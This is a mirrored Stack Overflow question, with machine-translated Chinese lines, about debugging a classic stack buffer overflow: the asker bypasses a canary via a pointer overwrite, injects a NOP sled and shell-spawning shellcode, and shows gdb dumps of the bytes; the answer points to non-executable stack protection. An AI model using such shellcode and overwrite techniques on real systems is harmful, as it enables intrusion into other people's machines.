堆栈内存溢出
  简体   繁体   English

缓冲区溢出:EIP和跳转设置正确但存在段错误

[英]Buffer overflow : EIP and jump correctly set but segfault

 原文  2016-04-09 00:07:44       c/ assembly/ gdb/ buffer-overflow/ eip

问题描述

I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained here . 我进行缓冲区溢出,避免通过的memcpy的指针金丝雀,作为解释在这里 In short, you overwrite the address a pointer points to, with the address of the RET in the stack. 简而言之,使用堆栈中RET的地址覆盖指针指向的地址。 So memcpy-ing to that pointer, effectively overwrites RET. 因此,对该指针的处理有效地覆盖了RET。

Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. 使用gdb,我注入了NOP底座+ shellcode + address_overwrite。 I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled. 我可以看到RET在0xbffff52c处包含一个所需地址0xbffff4c0,该地址将降落在NOP底座中。

(gdb) x /32xw $esp 0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000 0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090 0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090 0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c (gdb) 0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8 0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c 0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8 0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0 0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001 0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac 0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad 0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f

However , running this I get the error bellow, even though dissasembly shows I landed good. 但是,运行此命令会出现以下错误,即使显示出我的着陆很好。 

Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0:  nop
   0xbffff4c1:  nop
   0xbffff4c2:  nop
   0xbffff4c3:  nop
   0xbffff4c4:  nop
   0xbffff4c5:  nop
   0xbffff4c6:  nop
   0xbffff4c7:  nop
   0xbffff4c8:  nop
   0xbffff4c9:  nop

Further below is the shellcode. 下面是shellcode。 

    0xbffff4df:  jmp    0xbffff500
   0xbffff4e1:  pop    %esi
   0xbffff4e2:  mov    %esi,0x8(%esi)
   0xbffff4e5:  xor    %eax,%eax
   0xbffff4e7:  mov    %al,0x7(%esi)
   0xbffff4ea:  mov    %eax,0xc(%esi)
   0xbffff4ed:  mov    $0xb,%al
   0xbffff4ef:  mov    %esi,%ebx

... etc. ...等

I used the shellcode from Smashing the stack , Appendix B, for the linux system. 我为Linux系统使用了“ 粉碎堆栈 ”附录B中的shellcode。 Can you help me understand what's wrong? 你能帮我了解怎么了吗?

1 个解决方案

解决方案1
 4 已采纳  2016-04-09 00:28:48

You didn't say what OS you are on, or how you built your target program. 您没有说您正在使用什么操作系统,也没有说您如何构建目标程序。

Assuming Linux and no -Wl,-z,execstack , modern Linux distributions default to -Wl,-z,noexecstack , which (surprise!) makes stack non-executable. 假设Linux没有-Wl,-z,execstack ,则现代Linux发行版默认为-Wl,-z,noexecstack-Wl,-z,noexecstack ,这(使您惊讶)使堆栈不可执行。

You can read about some of the protection mechanisms here . 您可以在此处了解一些保护机制。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 缓冲区溢出 - 查找 EIP - Buffer Overflow - Finding EIP 导致缓冲区溢出,段错误 - Causing a buffer overflow, segfault shellcode 缓冲区溢出 -SegFault - shellcode buffer overflow -SegFault 缓冲区溢出未达到eip - buffer overflow doesn't reach eip 简单的缓冲区溢出 EIP 覆盖不起作用 - Simple buffer overflow EIP overwrite not working 缓冲区溢出期间EIP值不正确 - EIP value incorrect during buffer overflow 缓冲区溢出跳到禁用的功能 - Buffer overflow to jump to a disabled function 为什么在此缓冲区溢出尝试中eip不会改变? - Why does eip doesn't change in this buffer overflow attempt? 缓冲区溢出漏洞:函数的段错误转换为堆栈代码 - Buffer overflow exploit : segfault on function ret to stack code Fedora 32位上的缓冲区溢出测试不会改变$ eip寄存器值 - Buffer Overflow Test on Fedora 32-bit not changing $eip register value
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM